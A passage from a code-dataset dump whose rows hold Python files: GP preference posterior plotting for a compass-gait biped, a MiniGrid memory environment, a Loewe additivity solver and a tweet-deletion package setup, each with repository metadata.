hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k โ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 โ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 โ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k โ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 โ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 โ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k โ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 โ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 โ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
540974b01b23268f6d433583746dfaade82d9a64 | 6,190 | py | Python | Compass_gait_biped_simulations/Animate_posterior_compass_biped.py | ernovoseller/CoSpar | 2a9584dc9d1cdda5f7c0376ce744a18edab56cbb | [
"MIT"
] | 5 | 2020-11-18T14:05:13.000Z | 2021-05-18T15:00:33.000Z | Compass_gait_biped_simulations/Animate_posterior_compass_biped.py | ernovoseller/CoSpar | 2a9584dc9d1cdda5f7c0376ce744a18edab56cbb | [
"MIT"
] | null | null | null | Compass_gait_biped_simulations/Animate_posterior_compass_biped.py | ernovoseller/CoSpar | 2a9584dc9d1cdda5f7c0376ce744a18edab56cbb | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
For the ICRA video, we made some animations of how the preference model
posteriors evolve after each iteration. This script saves the stack of images
to make such an animation for the compass-gait biped's model posterior. For
every iteration, we save an image of the model posterior from one of the CG
biped simulation runs.
"""
import numpy as np
import scipy.io as io
import os
import matplotlib.pyplot as plt
from matplotlib import rcParams
rcParams.update({'font.size': 18})
from Preference_GP_learning import feedback
# SET THE FOLLOWING FLAG TO EITHER TRUE OR FALSE, DEPENDING ON WHETHER THE
# MODEL POSTERIOR INFORMATION FOR ALL RUNS HAS ALREADY BEEN SAVED. If the
# posterior information is already computed and saved, setting this to True
# will save runtime. If you try setting this to True but the information is not
# saved, then you will get an error. If you set this to False, then all of the
# necessary information will be saved, such that you can set this to True if
# running this script ever again.
posterior_already_computed = True
# Folder for saving plots:
save_plots_folder = 'Plots/CG_biped_animation_plots/'
if not os.path.isdir(save_plots_folder):
os.makedirs(save_plots_folder)
# Folder for saving (or loading) posterior information:
save_info_folder = 'Plotting_data/CG_biped_sim_posteriors/'
if not os.path.isdir(save_info_folder):
os.makedirs(save_info_folder)
# Load data to use for plotting evolution of the posterior:
CG_sim_folder = 'Compass_biped_results/'
run_num = 0
num_samples = 2 # CoSpar parameter (n)
num_pts_sample = 24 # Number of points in input domain
data = io.loadmat(CG_sim_folder + 'Opt_' + str(num_samples) + '_samples_' \
+ str(num_pts_sample) + '_pts_run_' + str(run_num) + \
'.mat')
data_pt_idxs = data['data_pt_idxs'] # Data: points alg. selected in simulation
pref_nums = data_pt_idxs.shape[0]
# Domain over which learning occurred:
points_to_sample = np.linspace(0.08, 0.18, num_pts_sample)
# Determine dimensionality of state space:
if len(points_to_sample.shape) == 1:
state_dim = 1
else:
state_dim = points_to_sample.shape[1]
if not posterior_already_computed:
points_to_sample = points_to_sample.reshape((num_pts_sample, state_dim))
# Load preference labels and GP model hyperparameters:
labels = data['labels']
preference_noise = data['preference_noise'][0][0]
lengthscales = data['lengthscale'][0]
signal_variance = data['signal_variance'][0][0]
GP_noise_var = data['GP_noise_var'][0][0]
# Instantiate the prior covariance matrix, using a squared exponential
# kernel in each dimension of the input space:
GP_prior_cov = signal_variance * np.ones((num_pts_sample, num_pts_sample))
for i in range(num_pts_sample):
pt1 = points_to_sample[i, :]
for j in range(num_pts_sample):
pt2 = points_to_sample[j, :]
for dim in range(state_dim):
lengthscale = lengthscales[dim]
if lengthscale > 0:
GP_prior_cov[i, j] *= np.exp(-0.5 * ((pt2[dim] - pt1[dim]) / \
lengthscale)**2)
elif lengthscale == 0 and pt1[dim] != pt2[dim]:
GP_prior_cov[i, j] = 0
GP_prior_cov += GP_noise_var * np.eye(num_pts_sample)
GP_prior_cov_inv = np.linalg.inv(GP_prior_cov)
points_to_sample = points_to_sample.flatten()
# Make a plot for each iteration of the algorithm.
for pref_num in range(pref_nums + 1):
print('Iter %i of %i' % (pref_num, pref_nums))
# Get model posterior to use for this plot:
if not posterior_already_computed:
# Preference data at this iteration:
X = data_pt_idxs[: pref_num, :]
y = labels[: pref_num, 1]
# Update the Gaussian process preference model:
posterior_model = feedback(X, y, GP_prior_cov_inv, preference_noise)
# Unpack model posterior:
post_mean = posterior_model['mean']
cov_evecs = np.real(posterior_model['cov_evecs'])
cov_evals = posterior_model['cov_evals']
else:
posterior_model = io.loadmat(save_info_folder + 'Compass_biped_' + \
str(pref_num) + '_preferences.mat')
# Unpack model posterior:
post_mean = posterior_model['post_mean'].flatten()
cov_evecs = np.real(posterior_model['cov_evecs'])
cov_evals = posterior_model['cov_evals'].flatten()
# Construct posterior covariance matrix:
post_cov = cov_evecs @ np.diag(cov_evals) @ np.linalg.inv(cov_evecs)
# Posterior standard deviation at each point:
post_stdev = np.sqrt(np.diag(post_cov))
# Without title, used (8, 6). (8, 6.3) keeps the actual plot the same size
# while adding a title.
plt.figure(figsize = (8, 6.3))
# Plot posterior mean and standard deviation:
plt.plot(points_to_sample, post_mean, color = 'blue', linewidth = 3)
plt.fill_between(points_to_sample, post_mean - 2*post_stdev,
post_mean + 2*post_stdev, alpha = 0.3, color = 'blue')
plt.ylim([-0.035, 0.043])
plt.xlabel('Step length (m)')
plt.ylabel('Posterior Utility')
plt.title('Number of Trials: ' + str(pref_num * 2))
plt.xticks([0.08, 0.13, 0.18])
plt.yticks([-0.02, 0, 0.02, 0.04])
plt.tight_layout()
if not posterior_already_computed:
# Save information about posterior:
io.savemat(save_info_folder + 'Compass_biped_' + str(pref_num) + \
'_preferences.mat', {'post_mean': post_mean,
'cov_evecs': cov_evecs,
'cov_evals': cov_evals})
# Save plot:
plt.savefig(save_plots_folder + 'Compass_biped_2STD_' + str(pref_num) + \
'_preferences_titled.png')
plt.close('all')
| 35.780347 | 82 | 0.639742 | # -*- coding: utf-8 -*-
"""
For the ICRA video, we made some animations of how the preference model
posteriors evolve after each iteration. This script saves the stack of images
to make such an animation for the compass-gait biped's model posterior. For
every iteration, we save an image of the model posterior from one of the CG
biped simulation runs.
"""
import numpy as np
import scipy.io as io
import os
import matplotlib.pyplot as plt
from matplotlib import rcParams
rcParams.update({'font.size': 18})
from Preference_GP_learning import feedback
# SET THE FOLLOWING FLAG TO EITHER TRUE OR FALSE, DEPENDING ON WHETHER THE
# MODEL POSTERIOR INFORMATION FOR ALL RUNS HAS ALREADY BEEN SAVED. If the
# posterior information is already computed and saved, setting this to True
# will save runtime. If you try setting this to True but the information is not
# saved, then you will get an error. If you set this to False, then all of the
# necessary information will be saved, such that you can set this to True if
# running this script ever again.
posterior_already_computed = True
# Folder for saving plots:
save_plots_folder = 'Plots/CG_biped_animation_plots/'
if not os.path.isdir(save_plots_folder):
os.makedirs(save_plots_folder)
# Folder for saving (or loading) posterior information:
save_info_folder = 'Plotting_data/CG_biped_sim_posteriors/'
if not os.path.isdir(save_info_folder):
os.makedirs(save_info_folder)
# Load data to use for plotting evolution of the posterior:
CG_sim_folder = 'Compass_biped_results/'
run_num = 0
num_samples = 2 # CoSpar parameter (n)
num_pts_sample = 24 # Number of points in input domain
data = io.loadmat(CG_sim_folder + 'Opt_' + str(num_samples) + '_samples_' \
+ str(num_pts_sample) + '_pts_run_' + str(run_num) + \
'.mat')
data_pt_idxs = data['data_pt_idxs'] # Data: points alg. selected in simulation
pref_nums = data_pt_idxs.shape[0]
# Domain over which learning occurred:
points_to_sample = np.linspace(0.08, 0.18, num_pts_sample)
# Determine dimensionality of state space:
if len(points_to_sample.shape) == 1:
state_dim = 1
else:
state_dim = points_to_sample.shape[1]
if not posterior_already_computed:
points_to_sample = points_to_sample.reshape((num_pts_sample, state_dim))
# Load preference labels and GP model hyperparameters:
labels = data['labels']
preference_noise = data['preference_noise'][0][0]
lengthscales = data['lengthscale'][0]
signal_variance = data['signal_variance'][0][0]
GP_noise_var = data['GP_noise_var'][0][0]
# Instantiate the prior covariance matrix, using a squared exponential
# kernel in each dimension of the input space:
GP_prior_cov = signal_variance * np.ones((num_pts_sample, num_pts_sample))
for i in range(num_pts_sample):
pt1 = points_to_sample[i, :]
for j in range(num_pts_sample):
pt2 = points_to_sample[j, :]
for dim in range(state_dim):
lengthscale = lengthscales[dim]
if lengthscale > 0:
GP_prior_cov[i, j] *= np.exp(-0.5 * ((pt2[dim] - pt1[dim]) / \
lengthscale)**2)
elif lengthscale == 0 and pt1[dim] != pt2[dim]:
GP_prior_cov[i, j] = 0
GP_prior_cov += GP_noise_var * np.eye(num_pts_sample)
GP_prior_cov_inv = np.linalg.inv(GP_prior_cov)
points_to_sample = points_to_sample.flatten()
# Make a plot for each iteration of the algorithm.
for pref_num in range(pref_nums + 1):
print('Iter %i of %i' % (pref_num, pref_nums))
# Get model posterior to use for this plot:
if not posterior_already_computed:
# Preference data at this iteration:
X = data_pt_idxs[: pref_num, :]
y = labels[: pref_num, 1]
# Update the Gaussian process preference model:
posterior_model = feedback(X, y, GP_prior_cov_inv, preference_noise)
# Unpack model posterior:
post_mean = posterior_model['mean']
cov_evecs = np.real(posterior_model['cov_evecs'])
cov_evals = posterior_model['cov_evals']
else:
posterior_model = io.loadmat(save_info_folder + 'Compass_biped_' + \
str(pref_num) + '_preferences.mat')
# Unpack model posterior:
post_mean = posterior_model['post_mean'].flatten()
cov_evecs = np.real(posterior_model['cov_evecs'])
cov_evals = posterior_model['cov_evals'].flatten()
# Construct posterior covariance matrix:
post_cov = cov_evecs @ np.diag(cov_evals) @ np.linalg.inv(cov_evecs)
# Posterior standard deviation at each point:
post_stdev = np.sqrt(np.diag(post_cov))
# Without title, used (8, 6). (8, 6.3) keeps the actual plot the same size
# while adding a title.
plt.figure(figsize = (8, 6.3))
# Plot posterior mean and standard deviation:
plt.plot(points_to_sample, post_mean, color = 'blue', linewidth = 3)
plt.fill_between(points_to_sample, post_mean - 2*post_stdev,
post_mean + 2*post_stdev, alpha = 0.3, color = 'blue')
plt.ylim([-0.035, 0.043])
plt.xlabel('Step length (m)')
plt.ylabel('Posterior Utility')
plt.title('Number of Trials: ' + str(pref_num * 2))
plt.xticks([0.08, 0.13, 0.18])
plt.yticks([-0.02, 0, 0.02, 0.04])
plt.tight_layout()
if not posterior_already_computed:
# Save information about posterior:
io.savemat(save_info_folder + 'Compass_biped_' + str(pref_num) + \
'_preferences.mat', {'post_mean': post_mean,
'cov_evecs': cov_evecs,
'cov_evals': cov_evals})
# Save plot:
plt.savefig(save_plots_folder + 'Compass_biped_2STD_' + str(pref_num) + \
'_preferences_titled.png')
plt.close('all')
| 0 | 0 | 0 |
c37a56745c7c38908f76b7304b7460e23194957e | 11,107 | py | Python | gym_minigrid/envs/fourrooms_memory.py | andreykurenkov/gym-minigrid | 2c053e8f78ebe6f7aa92cdf81c7539a4fffc12ec | [
"Apache-2.0"
] | null | null | null | gym_minigrid/envs/fourrooms_memory.py | andreykurenkov/gym-minigrid | 2c053e8f78ebe6f7aa92cdf81c7539a4fffc12ec | [
"Apache-2.0"
] | null | null | null | gym_minigrid/envs/fourrooms_memory.py | andreykurenkov/gym-minigrid | 2c053e8f78ebe6f7aa92cdf81c7539a4fffc12ec | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from gym_minigrid.minigrid import *
from gym_minigrid.register import register
from gym_minigrid.wrappers import RGBImgPartialObsWrapper
from gym_minigrid.wrappers import FrameStack
from collections import deque
from gym.spaces import Box
from gym import Wrapper
import numpy as np
import random
register(
id='MiniGrid-FourRoomsMemory-v0',
entry_point='gym_minigrid.envs:FourRoomsMemoryEnv'
)
register(
id='MiniGrid-FourRoomsMemoryRGB-v0',
entry_point='gym_minigrid.envs:rgb_env'
)
register(
id='MiniGrid-FourRoomsMemoryStacked-v0',
entry_point='gym_minigrid.envs:frame_stack_env'
)
| 33.966361 | 102 | 0.545062 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from gym_minigrid.minigrid import *
from gym_minigrid.register import register
from gym_minigrid.wrappers import RGBImgPartialObsWrapper
from gym_minigrid.wrappers import FrameStack
from collections import deque
from gym.spaces import Box
from gym import Wrapper
import numpy as np
import random
def create_shape(shape,color):
if shape=='square':
return ColoredSquare(color)
elif shape=='circle':
return ColoredCircle(color)
elif shape=='triangle':
return ColoredTriangle(color)
elif shape=='upside_down_triangle':
return ColoredUpsideDownTriangle(color)
class FourRoomsMemoryEnv(MiniGridEnv):
def __init__(self,
agent_pos=(7,7),
goal_pos=None,
random_seed=True,
random_goal=True,
random_rooms=False,
random_agent_pos=False,
room_walls=False,
room_shape_hints=False,
bits_actions=True,
num_bits = 8):
self._agent_default_pos = agent_pos
self._goal_default_pos = goal_pos
self._current_ep = 0
self._randomization_freq = 25000000000
self._num_room_objs = 1
self._random_seed = random_seed
self._random_goal = random_goal
self._random_rooms = random_rooms
self._random_agent_pos = random_agent_pos
self._room_walls = room_walls
self._room_shape_hints = room_shape_hints
self._bits_actions = bits_actions
self._num_bits = num_bits
self.shape_colors = ['red','green','blue','purple']
self.shape_types = ['square','circle','triangle','upside_down_triangle']
super().__init__(grid_size=15, max_steps=100)
if bits_actions:
self.memory_observation_space = spaces.Box(
low=0,
high=255,
shape=(1,),
dtype='uint8'
)
self.observation_space.spaces['memory'] = self.memory_observation_space
self.bits = [False]*num_bits
self.action_space = spaces.Discrete(len(self.actions)+4)
self.bit_memory = 0
else:
self.observation_space = self.observation_space.spaces['image']
def _gen_grid(self, width, height, reset = True):
if not self._random_seed:
self.seed(0)
random.seed(0)
# Create the grid
self.grid = Grid(width, height)
# Generate the surrounding walls
self.grid.horz_wall(0, 0)
self.grid.horz_wall(0, height - 1)
self.grid.vert_wall(0, 0)
self.grid.vert_wall(width - 1, 0)
room_w = width // 3
room_h = height // 3
if self._room_walls:
self.grid.horz_wall(0, room_h)
self.grid.horz_wall(0, 2*room_h)
self.grid.vert_wall(room_w, 0)
self.grid.vert_wall(room_w*2, 0)
pos = (room_w, self._rand_int(room_h+3, 2*room_h-3))
self.grid.set(*pos, None)
pos = (2*room_w, self._rand_int(room_h+3, 2*room_h-3))
self.grid.set(*pos, None)
pos = (self._rand_int(room_w+3, 2*room_w-3), room_h)
self.grid.set(*pos, None)
pos = (self._rand_int(room_w+3, 2*room_w-3), 2*room_h)
self.grid.set(*pos, None)
shape_colors = ['red','green','blue','purple']
shape_types = ['square','circle','triangle','upside_down_triangle']
if self._current_ep % self._randomization_freq == 0:
if self._random_goal:
self.goal_shape = random.choice(shape_types)
self.goal_color = random.choice(shape_colors)
else:
self.goal_shape = 'triangle'
self.goal_color = 'purple'
if self._random_rooms:
self.shape_rooms = list(shape_types)
random.shuffle(self.shape_rooms)
else:
self.shape_rooms = shape_types = ['square','circle','triangle','upside_down_triangle']
if reset:
self.shape_rooms = list(shape_types)
random.shuffle(self.shape_rooms)
self.goal_shape = random.choice(shape_types)
self.goal_color = random.choice(shape_colors)
hint_placements = [(width//2, 1),#height//2 - 3),
(width//2 + 3, height//2),
(width//2, height//2 + 3),
(width//2 - 3, height//2)]
if self._random_goal:
self.hint_placement = hint_placements[0]
self.hint_obj = create_shape(self.goal_shape,self.goal_color)
self.grid.set(*self.hint_placement, self.hint_obj)
obj_placement = [(width//2, height//2 - 3),
(width//2 + 3, height//2),
(width//2, height//2 + 3),
(width//2 - 3, height//2)]
if self._room_shape_hints:
for i in range(4):
shape = self.shape_rooms[i]
obj = create_shape(shape,'grey')
self.grid.set(*obj_placement[i], obj)
# Randomize the player start position and orientation
if self._agent_default_pos is not None:
self.agent_pos = self._agent_default_pos
self.grid.set(*self._agent_default_pos, None)
self.agent_dir = 3
else:
if self._random_agent_pos:
pos = (self._rand_int(room_w+1, 2*room_w-1), self._rand_int(room_h+1, 2*room_h-1))
self._agent_default_pos = pos
else:
self.agent_pos = (width//2,height//2)
self.agent_dir = self._rand_int(0, 4)
#self._agent_default_dir = self.agent_dir
room_tops = [(room_w+2,2),
(room_w*2+2,room_h+2),
(room_w+2,room_h*2+2),
(2,room_h+2)]
for i in range(4):
shape = self.shape_rooms[i]
for j in range(self._num_room_objs):
if shape==self.goal_shape and j==0:
color = self.goal_color
else:
color = random.choice(shape_colors)
while color == self.goal_color:
color = random.choice(shape_colors)
obj = create_shape(shape,color)
pos = self.place_obj(obj,room_tops[i],(room_w-4,room_h-4))
if shape==self.goal_shape and j==0:
self.goal_pos = pos
self.mission = 'win'
def step(self, action):
self.step_count += 1
done = False
reward = 0
# Get the position in front of the agent
fwd_pos = self.front_pos
# Get the contents of the cell in front of the agent
fwd_cell = self.grid.get(*fwd_pos)
# Rotate left
if action == self.actions.left:
self.agent_dir -= 1
if self.agent_dir < 0:
self.agent_dir += 4
# Rotate right
elif action == self.actions.right:
self.agent_dir = (self.agent_dir + 1) % 4
# Move forward
elif action == self.actions.forward:
if fwd_cell == None or fwd_cell.can_overlap():
self.agent_pos = fwd_pos
if fwd_cell != None and fwd_cell.type == 'goal':
done = True
if fwd_cell != None and fwd_cell.type == 'lava':
done = True
if fwd_cell != None and \
'colored' in fwd_cell.type:
if fwd_cell.shape == self.goal_shape and \
fwd_cell.color == self.goal_color and \
fwd_cell!=self.hint_obj:
reward = 5#self._reward()
#self._gen_grid(30, 30, False)
done = True
else:
reward = -5
# Pick up an object
elif action == self.actions.pickup:
if fwd_cell and fwd_cell.can_pickup():
if self.carrying is None:
self.carrying = fwd_cell
self.carrying.cur_pos = np.array([-1, -1])
self.grid.set(*fwd_pos, None)
# Drop an object
elif action == self.actions.drop:
if not fwd_cell and self.carrying:
self.grid.set(*fwd_pos, self.carrying)
self.carrying.cur_pos = fwd_pos
self.carrying = None
# Toggle/activate an object
elif action == self.actions.toggle:
if fwd_cell:
fwd_cell.toggle(self, fwd_pos)
# Done action (not used by default)
elif action == self.actions.done:
pass
elif action >= 7:
if not self.bits[action-7]:
self.bit_memory+= 2**(action-7)
else:
self.bit_memory-= 2**(action-7)
self.bits[action-7] = not self.bits[action-7]
else:
assert False, "unknown action"
if self.step_count >= self.max_steps:
done = True
reward+= self._reward()
if action > 2 and action < 7:
reward-= 0.1
'''
elif action >= 7 and action < 11:
shape_index = self.shape_types.index(self.goal_shape)
if action-7 == shape_index:
if self.bits[shape_index]:
reward+=0.5
else:
reward-=0.5
else:
reward-=0.05
elif action >=11:
color_index = self.shape_colors.index(self.goal_color)
if action-11 == color_index:
if self.bits[color_index+4]:
reward+=0.5
else:
reward-=0.5
else:
reward-=0.05
'''
obs = self.gen_obs()
obs['memory'] = [int(x) for x in self.bits]
#obs = obs['image']
return obs, reward, done, {}
def _reward(self):
agent_pos = np.array(self.agent_pos)
goal_pos = np.array(self.goal_pos)
reward = -np.linalg.norm(goal_pos - agent_pos)/100.0
return reward
def reset(self):
obs = super().reset()
if self._bits_actions:
self.bits = [False]*self._num_bits
self.bit_memory = 0
obs['memory'] = [int(x) for x in self.bits]
else:
obs = obs['image']
self._current_ep+=1
return obs
register(
id='MiniGrid-FourRoomsMemory-v0',
entry_point='gym_minigrid.envs:FourRoomsMemoryEnv'
)
def rgb_env():
env = FourRoomsMemoryEnv()
env = RGBImgPartialObsWrapper(env) # Get pixel observations
return env
register(
id='MiniGrid-FourRoomsMemoryRGB-v0',
entry_point='gym_minigrid.envs:rgb_env'
)
def frame_stack_env():
env = FourRoomsMemoryEnv()
env = FrameStack(env, 4)
return env
register(
id='MiniGrid-FourRoomsMemoryStacked-v0',
entry_point='gym_minigrid.envs:frame_stack_env'
)
| 10,205 | 17 | 227 |
53c98d607588d8ce88a263df9e07ac14a254f1e0 | 3,518 | py | Python | Equation_Solver8.py | mmankowski/Loewe-additivity-calculator | 43f7135429a992d932d805dfa8a4c3b0b8fc769c | [
"MIT"
] | null | null | null | Equation_Solver8.py | mmankowski/Loewe-additivity-calculator | 43f7135429a992d932d805dfa8a4c3b0b8fc769c | [
"MIT"
] | null | null | null | Equation_Solver8.py | mmankowski/Loewe-additivity-calculator | 43f7135429a992d932d805dfa8a4c3b0b8fc769c | [
"MIT"
] | null | null | null | # to run open terminal window in location then type 'python "scriptname.py" "filename.csv" ' - "" indicates that these portions are replaced with actual file names
# import necessary libraries
import csv
import sys
import math
# read in the file & convert "that memory" into a csv read file
f = open(sys.argv[1],'rb')
r = csv.reader(f)
# start at row 0 (first row)
i = 0
rows = []
for row in r:
#adds an array to the list of arrays (arrays = list of variables); rows = list of lists, aka a 2D array -> defining the layout of spreadsheet
rows.append([])
#look at columns, but only for the current row
for col in row:
rows[i].append(col)
# look at row 1, then row 2, then row 3....
i+=1
answers = []
m1 = float(rows[2][11])
m2 = float(rows[2][11])
Fa1A = float(rows[2][11])
Fa1B = float(rows[2][11])
Fa2A = float(rows[2][11])
Fa2B = float(rows[2][11])
#m constant for each experiment (does not change w/ dilutions - slope from linear regressions of log(Fa/Fu) v log(Dose) )
#notation: 1A = 1.1, 1B = 1.2, 2A = 2.1, 2B = 2.2
for row in xrange(2,12):
try:
m1 = float(rows[row][8])
m2 = float(rows[row][11])
Fa1A = float(rows[row][9])
Fa2A = float(rows[row][12])
Fu1A = 1-Fa1A
Fu2A = 1-Fa2A
rows[row][14] = equation_solver_wrapper(Fa1A, Fu1A, Fa2A, Fu2A, m1, m2)
rows[row][18] = 1 - rows[row][14]
rows[row][22] = math.log(rows[row][18]/rows[row][14] ,10)
except:
rows[row][14] = "DNE"
rows[row][18] = "DNE"
rows[row][22] = "DNE"
try:
m1 = float(rows[row][8])
m2 = float(rows[row][11])
Fa1A = float(rows[row][9])
Fa2B = float(rows[row][13])
Fu1A = 1-Fa1A
Fu2B = 1-Fa2B
rows[row][15] = equation_solver_wrapper(Fa1A, Fu1A, Fa2B, Fu2B, m1, m2)
rows[row][19] = 1 - rows[row][15]
rows[row][23] = math.log(rows[row][19]/rows[row][15],10)
except Exception as e:
rows[row][15] = "DNE"
rows[row][19] = "DNE"
rows[row][23] = "DNE"
try:
m1 = float(rows[row][8])
m2 = float(rows[row][11])
Fa1B = float(rows[row][10])
Fa2A = float(rows[row][12])
Fu1B = 1-Fa1B
Fu2A = 1-Fa2A
#guess Fu
rows[row][16] = equation_solver_wrapper(Fa1B, Fu1B, Fa2A, Fu2A, m1, m2)
#guess Fa
rows[row][20] = 1 - rows[row][16]
#guess inhib
rows[row][24] = math.log(rows[row][20]/rows[row][16],10)
except:
rows[row][16] = "DNE"
rows[row][20] = "DNE"
rows[row][24] = "DNE"
try:
m1 = float(rows[row][8])
m2 = float(rows[row][11])
Fa1B = float(rows[row][10])
Fa2B = float(rows[row][13])
Fu1B = 1-Fa1B
Fu2B = 1-Fa2B
rows[row][17] = equation_solver_wrapper(Fa1B, Fu1B, Fa2B, Fu2B, m1, m2)
rows[row][21] = 1 - rows[row][17]
rows[row][25] = math.log(rows[row][21]/rows[row][17],10)
except:
rows[row][17] = "DNE"
rows[row][21] = "DNE"
rows[row][25] = "DNE"
with open(sys.argv[2], "wb") as f:
writer = csv.writer(f)
writer.writerows(rows) | 24.774648 | 163 | 0.627345 | # to run open terminal window in location then type 'python "scriptname.py" "filename.csv" ' - "" indicates that these portions are replaced with actual file names
# import necessary libraries
import csv
import sys
import math
# read in the file & convert "that memory" into a csv read file
f = open(sys.argv[1],'rb')
r = csv.reader(f)
# start at row 0 (first row)
i = 0
rows = []
for row in r:
#adds an array to the list of arrays (arrays = list of variables); rows = list of lists, aka a 2D array -> defining the layout of spreadsheet
rows.append([])
#look at columns, but only for the current row
for col in row:
rows[i].append(col)
# look at row 1, then row 2, then row 3....
i+=1
answers = []
m1 = float(rows[2][11])
m2 = float(rows[2][11])
Fa1A = float(rows[2][11])
Fa1B = float(rows[2][11])
Fa2A = float(rows[2][11])
Fa2B = float(rows[2][11])
#m constant for each experiment (does not change w/ dilutions - slope from linear regressions of log(Fa/Fu) v log(Dose) )
#notation: 1A = 1.1, 1B = 1.2, 2A = 2.1, 2B = 2.2
def helper(numerator, denominator, exponent):
tmp = numerator/denominator
return tmp ** (1/exponent)
def solve_equation(First1, First2, Third1, Third2, m1, m2, FU):
first = helper(First1, First2, m1)
second = helper(FU, 1-FU, m1)
third = helper(Third1, Third2, m2)
fourth = helper(FU, 1-FU, m2)
return (first*second)+(third*fourth)
def equation_solver_wrapper(First1, First2, Third1, Third2, m1, m2):
guess = .5
step = .25
result = 0
for i in xrange(100):
result = solve_equation(First1, First2, Third1, Third2, m1, m2, guess)
if result > 1:
guess -= step
elif result < 1:
guess += step
else:
break
step = step/2
return guess
for row in xrange(2,12):
try:
m1 = float(rows[row][8])
m2 = float(rows[row][11])
Fa1A = float(rows[row][9])
Fa2A = float(rows[row][12])
Fu1A = 1-Fa1A
Fu2A = 1-Fa2A
rows[row][14] = equation_solver_wrapper(Fa1A, Fu1A, Fa2A, Fu2A, m1, m2)
rows[row][18] = 1 - rows[row][14]
rows[row][22] = math.log(rows[row][18]/rows[row][14] ,10)
except:
rows[row][14] = "DNE"
rows[row][18] = "DNE"
rows[row][22] = "DNE"
try:
m1 = float(rows[row][8])
m2 = float(rows[row][11])
Fa1A = float(rows[row][9])
Fa2B = float(rows[row][13])
Fu1A = 1-Fa1A
Fu2B = 1-Fa2B
rows[row][15] = equation_solver_wrapper(Fa1A, Fu1A, Fa2B, Fu2B, m1, m2)
rows[row][19] = 1 - rows[row][15]
rows[row][23] = math.log(rows[row][19]/rows[row][15],10)
except Exception as e:
rows[row][15] = "DNE"
rows[row][19] = "DNE"
rows[row][23] = "DNE"
try:
m1 = float(rows[row][8])
m2 = float(rows[row][11])
Fa1B = float(rows[row][10])
Fa2A = float(rows[row][12])
Fu1B = 1-Fa1B
Fu2A = 1-Fa2A
#guess Fu
rows[row][16] = equation_solver_wrapper(Fa1B, Fu1B, Fa2A, Fu2A, m1, m2)
#guess Fa
rows[row][20] = 1 - rows[row][16]
#guess inhib
rows[row][24] = math.log(rows[row][20]/rows[row][16],10)
except:
rows[row][16] = "DNE"
rows[row][20] = "DNE"
rows[row][24] = "DNE"
try:
m1 = float(rows[row][8])
m2 = float(rows[row][11])
Fa1B = float(rows[row][10])
Fa2B = float(rows[row][13])
Fu1B = 1-Fa1B
Fu2B = 1-Fa2B
rows[row][17] = equation_solver_wrapper(Fa1B, Fu1B, Fa2B, Fu2B, m1, m2)
rows[row][21] = 1 - rows[row][17]
rows[row][25] = math.log(rows[row][21]/rows[row][17],10)
except:
rows[row][17] = "DNE"
rows[row][21] = "DNE"
rows[row][25] = "DNE"
with open(sys.argv[2], "wb") as f:
writer = csv.writer(f)
writer.writerows(rows) | 595 | 0 | 71 |
f4fbe171060d67aad65e5f5de62f76eb891714f0 | 800 | py | Python | setup.py | beaumartinez/twittercide | 5ef74560f17f7e2497edb3ae915dc0172e4fcf5d | [
"0BSD"
] | 2 | 2015-01-04T04:34:03.000Z | 2018-04-18T20:35:29.000Z | setup.py | beaumartinez/twittercide | 5ef74560f17f7e2497edb3ae915dc0172e4fcf5d | [
"0BSD"
] | null | null | null | setup.py | beaumartinez/twittercide | 5ef74560f17f7e2497edb3ae915dc0172e4fcf5d | [
"0BSD"
] | null | null | null | #! /usr/bin/env python
from setuptools import find_packages
from setuptools import setup
with open('README.md') as readme_file:
readme = readme_file.read()
setup(
author='Beau Martinez',
classifiers=[
'Programming Language :: Python :: 2.7',
],
description='Delete your tweets and backup tweeted photos to Google Drive.',
entry_points={
'console_scripts': [
'twittercide = twittercide.__main__:main',
],
},
install_requires=[
'arrow==0.4.4',
'python-dateutil>=2.3',
'requests-foauth>=0.1.1',
'requests>=2.5.0',
],
licence='ISC',
long_description=readme,
name='twittercide',
packages=find_packages(),
url='http://github.com/beaumartinez/twittercide',
version='0.1',
)
| 22.857143 | 80 | 0.61375 | #! /usr/bin/env python
from setuptools import find_packages
from setuptools import setup
with open('README.md') as readme_file:
readme = readme_file.read()
setup(
author='Beau Martinez',
classifiers=[
'Programming Language :: Python :: 2.7',
],
description='Delete your tweets and backup tweeted photos to Google Drive.',
entry_points={
'console_scripts': [
'twittercide = twittercide.__main__:main',
],
},
install_requires=[
'arrow==0.4.4',
'python-dateutil>=2.3',
'requests-foauth>=0.1.1',
'requests>=2.5.0',
],
licence='ISC',
long_description=readme,
name='twittercide',
packages=find_packages(),
url='http://github.com/beaumartinez/twittercide',
version='0.1',
)
| 0 | 0 | 0 |
9c4590f9f6a92336f506f82a881a87cbc141ae94 | 10,753 | py | Python | backend/database/result.py | brownben/munro | 2beeae23f29fd064b102a44a1c2d3d852eed65e0 | [
"MIT"
] | 5 | 2020-02-02T14:58:15.000Z | 2022-01-07T08:24:37.000Z | backend/database/result.py | brownben/munro | 2beeae23f29fd064b102a44a1c2d3d852eed65e0 | [
"MIT"
